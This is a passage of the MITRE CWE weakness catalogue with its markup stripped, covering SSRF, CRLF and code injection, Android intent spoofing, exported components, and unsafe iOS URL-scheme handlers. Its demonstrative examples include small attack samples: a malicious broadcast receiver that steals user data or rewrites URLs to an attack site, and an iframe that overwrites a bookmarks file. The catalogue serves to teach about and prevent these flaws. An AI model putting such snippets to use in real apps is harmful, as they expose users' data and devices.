requirements, design, source code, etc.) - - - - - High - - - - - Architecture and Design - - Use an adaptive hash function that can be configured to change the amount of computational effort needed to compute the hash, such as the number of iterations ("stretching") or the amount of memory required. Some hash functions perform salting automatically. These functions can significantly increase the overhead for a brute force attack compared to intentionally-fast functions such as MD5. For example, rainbow table attacks can become infeasible due to the high computing overhead. Finally, since computing power gets faster and cheaper over time, the technique can be reconfigured to increase the workload without forcing an entire replacement of the algorithm in use. - Some hash functions that have one or more of these desired properties include bcrypt [REF-291], scrypt [REF-292], and PBKDF2 [REF-293]. While there is active debate about which of these is the most effective, they are all stronger than using salts with hash functions with very little computing overhead. - Note that using these functions can have an impact on performance, so they require special consideration to avoid denial-of-service attacks. However, their configurability provides finer control over how much CPU and memory is used, so it could be adjusted to suit the environment's needs. - - High - - - Implementation - Architecture and Design - When using industry-approved techniques, use them correctly. Don't cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for preventing common attacks. - - - - - CVE-2008-1526 - Router does not use a salt with a hash, making it easier to crack passwords. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1526 - - - CVE-2006-1058 - Router does not use a salt with a hash, making it easier to crack passwords. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1058 - - - CVE-2008-4905 - Blogging software uses a hard-coded salt when calculating a password hash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4905 - - - CVE-2002-1657 - Database server uses the username for a salt when encrypting passwords, simplifying brute force attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1657 - - - CVE-2001-0967 - Server uses a constant salt when encrypting passwords, simplifying brute force attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0967 - - - CVE-2005-0408 - chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0408 - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2013-01-28 - Created with input from members of the secure password hashing community. - - - CWE Content Team - MITRE - 2014-02-18 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Description - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software constructs all or part of an expression language (EL) statement in a Java Server Page (JSP) using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended EL statement before it is executed. - - - - - - - - - Primary - - - - - - - - EL Injection - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Read Application Data - - - Integrity - Execute Unauthorized Code or Commands - - - - - - - - In certain versions of Spring 3.0.5 and earlier, there was a vulnerability (CVE-2011-2730) in which Expression Language tags would be evaluated twice, which effectively exposed any application to EL injection. However, even for later versions, this weakness is still possible depending on configuration. - - - - CWE Content Team - MITRE - 2013-02-15 - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated References - - - Dan Amodio, Dave Wichers - Aspect Security - 2013-02-15 - Suggested adding this weakness and provided references. - - - - - The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. - By providing URLs to unexpected hosts or ports, attackers can make it appear that the server is sending the request, possibly bypassing access controls such as firewalls that prevent the attackers from accessing the URLs directly. The server can be used as a proxy to conduct port scanning of hosts in internal networks, use other URLs such as that can access documents on the system (using file://), or use other protocols such as gopher:// or tftp://, which may provide greater control over the contents of requests. - - - - - - - - - - - XSPA - Cross Site Port Attack - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Read Application Data - - - Integrity - Execute Unauthorized Code or Commands - - - - - CVE-2002-1484 - Web server allows attackers to request a URL from another server, including other ports, which allows proxied scanning. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1484 - - - CVE-2004-2061 - CGI script accepts and retrieves incoming URLs. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2061 - - - CVE-2010-1637 - Web-based mail program allows internal network scanning using a modified POP3 port number. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1637 - - - CVE-2009-0037 - URL-downloading library automatically follows redirects to file:// and scp:// URLs - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0037 - - - - - - - - - - - - - - - - - CWE-918 (SSRF) and CWE-611 (XXE) are closely related, because they both involve web-related technologies and can launch outbound requests to unexpected destinations. However, XXE can be performed client-side, or in other contexts in which the software is not acting directly as a server, so the "Server" portion of the SSRF acronym does not necessarily apply. - - - - CWE Content Team - MITRE - 2013-02-17 - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, References - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated References, Related_Attack_Patterns, Relationships - - - - - This entry has been deprecated. It originally came from PLOVER, which sometimes defined "other" and "miscellaneous" categories in order to satisfy exhaustiveness requirements for taxonomies. Within the context of CWE, the use of a more abstract entry is preferred in mapping situations. CWE-75 is a more appropriate mapping. - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Name - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Applicable_Platforms, Causal_Nature, Maintenance_Notes, Name, Observed_Examples, Potential_Mitigations, Related_Attack_Patterns, Relationship_Notes, Relationships, Research_Gaps, Taxonomy_Mappings, Time_of_Introduction, Type, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Maintenance_Notes - - Custom Special Character Injection - Insufficient Sanitization of Custom Special Characters - Improper Sanitization of Custom Special Characters - - - - The software operates in an environment in which power is a limited resource that cannot be automatically replenished, but the software does not properly restrict the amount of power that its operation consumes. - - In environments such as embedded or mobile devices, power can be a limited resource such as a battery, which cannot be automatically replenished by the software itself, and the device might not always be directly attached to a reliable power source. If the software uses too much power too quickly, then this could cause the device (and subsequently, the software) to stop functioning until power is restored, or increase the financial burden on the device owner because of increased power costs. - Normal operation of an application will consume power. However, in some cases, an attacker could cause the application to consume more power than intended, using components such as: - - - Display - CPU - Disk I/O - GPS - Sound - Microphone - USB interface - - - - - - - - - - - - - - Architecture and Design - - - - - Availability - DoS: Resource Consumption (Other) - DoS: Crash, Exit, or Restart - The power source could be drained, causing the application - and the entire device - to cease functioning. - - - - - CWE Content Team - MITRE - 2013-06-11 - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - - - The software stores sensitive information in a file system or device that does not have built-in access control. - - While many modern file systems or devices utilize some form of access control in order to restrict access to data, not all storage mechanisms have this capability. For example, memory cards, floppy disks, CDs, and USB devices are typically made accessible to any user within the system. This can become a problem when sensitive data is stored in these mechanisms in a multi-user environment, because anybody on the system can read or write this data. - On Android devices, external storage is typically globally readable and writable by other applications on the device. External storage may also be easily accessible through the mobile device's USB connection or physically accessible through the device's memory card port. - - - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - - - Confidentiality - Read Application Data - Read Files or Directories - Attackers can read sensitive information by accessing the unrestricted storage mechanism. - - - Integrity - Modify Application Data - Modify Files or Directories - Attackers can modify or delete sensitive information by accessing the unrestricted storage mechanism. - - - - - - - - CWE Content Team - MITRE - 2013-06-22 - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - - - The software stores sensitive information without properly limiting read or write access by unauthorized actors. - If read access is not properly restricted, then attackers can steal the sensitive information. If write access is not properly restricted, then attackers can modify and possibly delete the data, causing incorrect results and possibly a denial of service. - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - System Configuration - - - - - Confidentiality - Read Application Data - Read Files or Directories - Attackers can read sensitive information by accessing the unrestricted storage mechanism. - - - Integrity - Modify Application Data - Modify Files or Directories - Attackers can read sensitive information by accessing the unrestricted storage mechanism. - - - - There is an overlapping relationship between insecure storage of sensitive information (CWE-922) and missing encryption of sensitive information (CWE-311). Encryption is often used to prevent an attacker from reading the sensitive data. However, encryption does not prevent the attacker from erasing or overwriting the data. - This is a high-level entry that includes children from various parts of the CWE research view (CWE-1000). Currently, most of the information is in these child entries. This entry will be made more comprehensive in later CWE versions. - - - - CWE Content Team - MITRE - 2013-06-23 - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - - - The software establishes a communication channel to (or from) an endpoint for privileged or protected operations, but it does not properly ensure that it is communicating with the correct endpoint. - - Attackers might be able to spoof the intended endpoint from a different system or process, thus gaining the same level of access as the intended endpoint. - While this issue frequently involves authentication between network-based clients and servers, other types of communication channels and endpoints can have this weakness. - - - - - - - - - - Architecture and Design - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Integrity - Confidentiality - Gain Privileges or Assume Identity - If an attacker can spoof the endpoint, the attacker gains all the privileges that were intended for the original endpoint. - - - - - - - - CWE Content Team - MITRE - 2013-06-23 - - - CWE Content Team - MITRE - 2014-02-18 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - Improper Authentication of Endpoint in a Communication Channel - - - - The software establishes a communication channel with an endpoint and receives a message from that endpoint, but it does not sufficiently ensure that the message was not modified during transmission. - Attackers might be able to modify the message and spoof the endpoint by interfering with the data as it crosses the network or by redirecting the connection to a system under their control. - - - - - - - - - - Architecture and Design - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Integrity - Confidentiality - Gain Privileges or Assume Identity - If an attackers can spoof the endpoint, the attacker gains all the privileges that were intended for the original endpoint. - - - - This entry should be made more comprehensive in later CWE versions, as it is likely an important design flaw that underlies (or chains to) other weaknesses. - - - - CWE Content Team - MITRE - 2013-06-23 - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - - - The Android application uses a Broadcast Receiver that receives an Intent but does not properly verify that the Intent came from an authorized source. - Certain types of Intents, identified by action string, can only be broadcast by the operating system itself, not by third-party applications. However, when an application registers to receive these implicit system intents, it is also registered to receive any explicit intents. While a malicious application cannot send an implicit system intent, it can send an explicit intent to the target application, which may assume that any received intent is a valid implicit system intent and not an explicit intent from another application. This may lead to unintended behavior. - - - - - - - - - - Intent Spoofing - - - - - Architecture and Design - - - - - Integrity - Gain Privileges or Assume Identity - Another application can impersonate the operating system and cause the software to perform an unintended action. - - - - - Architecture and Design - Before acting on the Intent, check the Intent Action to make sure it matches the expected System action. - - - - - The following example demonstrates the weakness. - - <manifest package="com.example.vulnerableApplication"> - <application> - ... - - - <receiver android:name=".ShutdownReceiver"><intent-filter><action android:name="android.intent.action.ACTION_SHUTDOWN" /></intent-filter></receiver> - - - ... - - </application> - </manifest> - - The ShutdownReceiver class will handle the intent: - - - - ... - IntentFilter filter = new IntentFilter(Intent.ACTION_SHUTDOWN);BroadcastReceiver sReceiver = new ShutDownReceiver();registerReceiver(sReceiver, filter); - ... - - public class ShutdownReceiver extends BroadcastReceiver {@Overridepublic void onReceive(final Context context, final Intent intent) {mainActivity.saveLocalData();mainActivity.stopActivity();}} - - Because the method does not confirm that the intent action is the expected system intent, any received intent will trigger the shutdown procedure, as shown here: - - window.location = examplescheme://method?parameter=value - - An attacker can use this behavior to cause a denial of service. - - - - - - - - - - This entry will be made more comprehensive in later CWE versions. - - - - CWE Content Team - MITRE - 2013-06-24 - - - CWE Content Team - MITRE - 2014-02-18 - updated Alternate_Terms, Demonstrative_Examples, Description, References - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - - - The Android application exports a component for use by other applications, but does not properly restrict which applications can launch the component or access the data it contains. - - The attacks and consequences of improperly exporting a component may depend on the exported component: - - - If access to an exported Activity is not restricted, any application will be able to launch the activity. This may allow a malicious application to gain access to sensitive information, modify the internal state of the application, or trick a user into interacting with the victim application while believing they are still interacting with the malicious application. - If access to an exported Service is not restricted, any application may start and bind to the Service. Depending on the exposed functionality, this may allow a malicious application to perform unauthorized actions, gain access to sensitive information, or corrupt the internal state of the application. - If access to a Content Provider is not restricted to only the expected applications, then malicious applications might be able to access the sensitive data. Note that in Android before 4.2, the Content Provider is automatically exported unless it has been explicitly declared as NOT exported. - - - - - - - - - - - - - There are three types of components that can be exported in an Android application. - Activity - An Activity is an application component that provides a UI for users to interact with. A typical application will have multiple Activity screens that perform different functions, such as a main Activity screen and a separate settings Activity screen. - Service - A Service is an application component that is started by another component to execute an operation in the background, even after the invoking component is terminated. Services do not have a UI component visible to the user. - Content Provider - The Content Provider mechanism can be used to share data with other applications or internally within the same application. - - - - - Architecture and Design - - - - - Availability - Integrity - Unexpected State - DoS: Crash, Exit, or Restart - DoS: Instability - Varies by Context - Other applications, possibly untrusted, can launch the Activity. - - - Availability - Integrity - Unexpected State - Gain Privileges or Assume Identity - DoS: Crash, Exit, or Restart - DoS: Instability - Varies by Context - Other applications, possibly untrusted, can bind to the Service. - - - Confidentiality - Integrity - Read Application Data - Modify Application Data - Other applications, possibly untrusted, can read or modify the data that is offered by the Content Provider. - - - - - Build and Compilation - Attack Surface Reduction - If they do not need to be shared by other applications, explicitly mark components with android:exported="false" in the application manifest. - - - Build and Compilation - Attack Surface Reduction - If you only intend to use exported components between related apps under your control, use android:protectionLevel="signature" in the xml manifest to restrict access to applications signed by you. - - - Build and Compilation - Architecture and Design - Attack Surface Reduction - Limit Content Provider permissions (read/write) as appropriate. - - - Build and Compilation - Architecture and Design - Separation of Privilege - Limit Content Provider permissions (read/write) as appropriate. - - - - - This application is exporting an activity and a service in its manifest.xml: - - <activity android:name="com.example.vulnerableApp.mainScreen"> - - - ... - <intent-filter><action android:name="com.example.vulnerableApp.OPEN_UI" /><category android:name="android.intent.category.DEFAULT" /></intent-filter> - ... - - - </activity><service android:name="com.example.vulnerableApp.backgroundService"> - - - ... - <intent-filter><action android:name="com.example.vulnerableApp.START_BACKGROUND" /></intent-filter> - ... - - - </service> - - Because these components have intent filters but have not explicitly set 'android:exported=false' elsewhere in the manifest, they are automatically exported so that any other application can launch them. This may lead to unintended behavior or exploits. - - - This application has created a content provider to enable custom search suggestions within the application: - - <provider>android:name="com.example.vulnerableApp.searchDB"android:authorities="com.example.vulnerableApp.searchDB"></provider> - - Because this content provider is only intended to be used within the application, it does not need to be exported. However, in Android before 4.2, it is automatically exported thus potentially allowing malicious applications to access sensitive information. - - - - - - - - CWE Content Team - MITRE - 2013-07-02 - - - CWE Content Team - MITRE - 2014-01-22 - Critical - Expanded entry to be more general and include all types of Android components that may be improperly exported. - - - CWE Content Team - MITRE - 2014-02-18 - updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - Improper Restriction of Content Provider Export to Other Applications - - - - The Android application uses an implicit intent for transmitting sensitive data to other applications. - - Since an implicit intent does not specify a particular application to receive the data, any application can process the intent by using an Intent Filter for that intent. This can allow untrusted applications to obtain sensitive data. There are two variations on the standard broadcast intent, ordered and sticky. - Ordered broadcast intents are delivered to a series of registered receivers in order of priority as declared by the Receivers. A malicious receiver can give itself a high priority and cause a denial of service by stopping the broadcast from propagating further down the chain. There is also the possibility of malicious data modification, as a receiver may also alter the data within the Intent before passing it on to the next receiver. The downstream components have no way of asserting that the data has not been altered earlier in the chain. - Sticky broadcast intents remain accessible after the initial broadcast. An old sticky intent will be broadcast again to any new receivers that register for it in the future, greatly increasing the chances of information exposure over time. Also, sticky broadcasts cannot be protected by permissions that may apply to other kinds of intents. - In addition, any broadcast intent may include a URI that references data that the receiving component does not normally have the privileges to access. The sender of the intent can include special privileges that grant the receiver read or write access to the specific URI included in the intent. A malicious receiver that intercepts this intent will also gain those privileges and be able to read or write the resource at the specified URI. - - - - - - - - - - - - Architecture and Design - - - - - Confidentiality - Read Application Data - Other applications, possibly untrusted, can read the data that is offered through the Intent. - - - Integrity - Varies by Context - The application may handle responses from untrusted applications on the device, which could cause it to perform unexpected or unauthorized actions. - - - - - Implementation - If the application only requires communication with its own components, then the destination is always known, and an explicit intent could be used. - - - - - This application wants to create a user account in several trusted applications using one broadcast intent: - - Intent intent = new Intent();intent.setAction("com.example.CreateUser");intent.putExtra("Username", uname_string);intent.putExtra("Password", pw_string);sendBroadcast(intent); - - This application assumes only the trusted applications will be listening for the action. A malicious application can register for this action and intercept the user's login information, as below: - - IntentFilter filter = new IntentFilter("com.example.CreateUser");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter); - - When a broadcast contains sensitive information, create an allowlist of applications that can receive the action using the application's manifest file, or programmatically send the intent to each individual intended receiver. - - - This application interfaces with a web service that requires a separate user login. It creates a sticky intent, so that future trusted applications that also use the web service will know who the current user is: - - Intent intent = new Intent();intent.setAction("com.example.service.UserExists");intent.putExtra("Username", uname_string);sendStickyBroadcast(intent); - - - IntentFilter filter = new IntentFilter("com.example.service.UserExists");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter); - - Sticky broadcasts can be read by any application at any time, and so should never contain sensitive information such as a username. - - - This application is sending an ordered broadcast, asking other applications to open a URL: - - Intent intent = new Intent();intent.setAction("com.example.OpenURL");intent.putExtra("URL_TO_OPEN", url_string);sendOrderedBroadcastAsUser(intent); - - Any application in the broadcast chain may alter the data within the intent. This malicious application is altering the URL to point to an attack site: - - public class CallReceiver extends BroadcastReceiver {@Overridepublic void onReceive(Context context, Intent intent) {String Url = intent.getStringExtra(Intent.URL_TO_OPEN);attackURL = "www.example.com/attack?" + Url;setResultData(attackURL);}} - - The final receiving application will then open the attack URL. Where possible, send intents to specific trusted applications instead of using a broadcast chain. - - - This application sends a special intent with a flag that allows the receiving application to read a data file for backup purposes. - - Intent intent = new Intent();intent.setAction("com.example.BackupUserData");intent.setData(file_uri);intent.addFlags(FLAG_GRANT_READ_URI_PERMISSION);sendBroadcast(intent); - - - public class CallReceiver extends BroadcastReceiver {@Overridepublic void onReceive(Context context, Intent intent) {Uri userData = intent.getData();stealUserData(userData);}} - - Any malicious application can register to receive this intent. Because of the FLAG_GRANT_READ_URI_PERMISSION included with the intent, the malicious receiver code can read the user's data. - - - - - - - - - CWE Content Team - MITRE - 2013-07-09 - - - CWE Content Team - MITRE - 2014-02-18 - updated Demonstrative_Examples, Description, References - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - - - The software uses CRLF (carriage return line feeds) as a special element, e.g. to separate lines or records, but it does not neutralize or incorrectly neutralizes CRLF sequences from inputs. - - - - - - - Primary - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Integrity - Modify Application Data - - - - - Implementation - Avoid using CRLF as a special sequence. - - - Implementation - Appropriately filter or quote CRLF sequences in user-controlled input. - - - - - If user input data that eventually makes it to a log message isn't checked for CRLF characters, it may be possible for an attacker to forge entries in a log file. - - logger.info("User's street address: " + request.getParameter("streetAddress")); - - - - - - CVE-2002-1771 - CRLF injection enables spam proxy (add mail headers) using email address or name. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1771 - - - CVE-2002-1783 - CRLF injection in API function arguments modify headers for outgoing requests. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1783 - - - CVE-2004-1513 - Spoofed entries in web server log file via carriage returns - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1513 - - - CVE-2006-4624 - Chain: inject fake log entries with fake timestamps using CRLF injection - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4624 - - - CVE-2005-1951 - Chain: Application accepts CRLF in an object ID, allowing HTTP response splitting. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1951 - - - CVE-2004-1687 - Chain: HTTP response splitting via CRLF in parameter related to URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1687 - - - - - CRLF Injection - - - A2 - Injection Flaws - CWE More Specific - - - 24 - HTTP Request Splitting - - - SFP24 - Tainted input to command - - - - - - - - - - - Probably under-studied, although gaining more prominence in 2005 as a result of interest in HTTP response splitting. - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-03-10 - updated References - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes - - - CWE Content Team - MITRE - 2009-12-28 - updated Likelihood_of_Exploit - - - CWE Content Team - MITRE - 2010-02-16 - updated Related_Attack_Patterns, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - CRLF Injection - Failure to Sanitize CRLF Sequences (aka 'CRLF Injection') - Failure to Sanitize CRLF Sequences ('CRLF Injection') - - - - The software uses a handler for a custom URL scheme, but it does not properly restrict which actors can invoke the handler using the scheme. - Mobile platforms and other architectures allow the use of custom URL schemes to facilitate communication between applications. In the case of iOS, this is the only method to do inter-application communication. The implementation is at the developer's discretion which may open security flaws in the application. An example could be potentially dangerous functionality such as modifying files through a custom URL scheme. - - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Architecture and Design - - Utilize a user prompt pop-up to authorize potentially harmful actions such as those modifying data or dealing with sensitive information. - When designing functionality of actions in the URL scheme, consider whether the action should be accessible to all mobile applications, or if an allowlist of applications to interface with is appropriate. - - - - - - This iOS application uses a custom URL scheme. The replaceFileText action in the URL scheme allows an external application to interface with the file incomingMessage.txt and replace the contents with the text field of the query string. - External Application - - NSString *stringURL = @"appscheme://replaceFileText?file=incomingMessage.txt&text=hello";NSURL *url = [NSURL URLWithString:stringURL];[[UIApplication sharedApplication] openURL:url]; - - Application URL Handler - - - - (BOOL)application:(UIApplication *)application handleOpenURL:(NSURL *)url {if (!url) {return NO;}NSString *action = [url host];if([action isEqualToString: @"replaceFileText"]) {NSDictionary *dict = [self parseQueryStringExampleFunction:[url query]]; - //this function will write contents to a specified file - FileObject *objectFile = [self writeToFile:[dict objectForKey: @"file"] withText:[dict objectForKey: @"text"]];}return YES;} - - The handler has no restriction on who can use its functionality. The handler can be invoked using any method that invokes the URL handler such as the following malicious iframe embedded on a web page opened by Safari. - - <iframe src="appscheme://replaceFileText?file=Bookmarks.dat&text=listOfMaliciousWebsites"> - - The attacker can host a malicious website containing the iframe and trick users into going to the site via a crafted phishing email. Since Safari automatically executes iframes, the user is not prompted when the handler executes the iframe code which automatically invokes the URL handler replacing the bookmarks file with a list of malicious websites. Since replaceFileText is a potentially dangerous action, an action that modifies data, there should be a sanity check before the writeToFile:withText: function. - - - These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application: - - - // Android - @Overridepublic boolean shouldOverrideUrlLoading(WebView view, String url){ - if (url.substring(0,14).equalsIgnoreCase("examplescheme:")){if(url.substring(14,25).equalsIgnoreCase("getUserInfo")){writeDataToView(view, UserData);return false;}else{return true;}} - } - - - - // iOS - -(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType{ - NSURL *URL = [exRequest URL];if ([[URL scheme] isEqualToString:@"exampleScheme"]){ - NSString *functionString = [URL resourceSpecifier];if ([functionString hasPrefix:@"specialFunction"]){ - - - // Make data available back in webview. - UIWebView *webView = [self writeDataToView:[URL query]]; - }return NO; - }return YES; - } - - A call into native code can then be initiated by passing parameters within the URL: - - window.location = examplescheme://method?parameter=value - - Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site. - - - - - CVE-2013-5725 - URL scheme has action replace which requires no user prompt and allows remote attackers to perform undesired actions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5725 - - - CVE-2013-5726 - URL scheme has action follow and favorite which allows remote attackers to force user to perform undesired actions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5726 - - - - - - - - CWE Content Team - MITRE - 2014-01-14 - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - The software constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. - - When software allows a user's input to contain code syntax, it might be possible for an attacker to craft the code in such a way that it will alter the intended control flow of the software. Such an alteration could lead to arbitrary code execution. - Injection problems encompass a wide variety of issues -- all mitigated in very different ways. For this reason, the most effective way to discuss these weaknesses is to note the distinct features which classify them as injection weaknesses. The most important issue to note is that all injection problems share one thing in common -- i.e., they allow for the injection of control plane data into the user-controlled data plane. This means that the execution of the process may be altered by sending code in through legitimate data channels, using no other mechanism. While buffer overflows, and many other flaws, involve the use of some further issue to gain execution, injection problems need only for the data to be parsed. The most classic instantiations of this category of weakness are SQL injection and format string vulnerabilities. - - - - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Medium - - - Access Control - Bypass Protection Mechanism - In some cases, injectable code controls authentication; this may lead to a remote vulnerability. - - - Access Control - Gain Privileges or Assume Identity - Injected code can access resources that the attacker is directly prevented from accessing. - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - Code injection attacks can lead to loss of data integrity in nearly all cases as the control-plane data injected is always incidental to data recall or writing. Additionally, code injection can often result in the execution of arbitrary code. - - - Non-Repudiation - Hide Activities - Often the actions performed by injected control code are unlogged. - - - - - Architecture and Design - Refactor your program so that you do not have to dynamically generate code. - - - Architecture and Design - - Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your software. - Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. - This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. - Be careful to avoid CWE-243 and other weaknesses related to jails. - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, 